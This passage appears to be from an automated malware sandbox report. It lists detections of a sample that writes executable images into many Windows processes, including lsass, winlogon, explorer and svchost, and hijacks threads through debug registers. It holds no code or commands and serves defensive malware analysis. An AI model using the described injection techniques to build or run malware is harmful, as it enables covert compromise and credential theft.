Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 277167A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 277167D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 22123BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 22123BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 13F081C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 13F08E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FD17760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FD186A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D03D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A4E5670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FFFD320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 9070000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 9070000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1740 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1244
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 1740 1 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 870000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 34D5B74010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADECD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23023330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
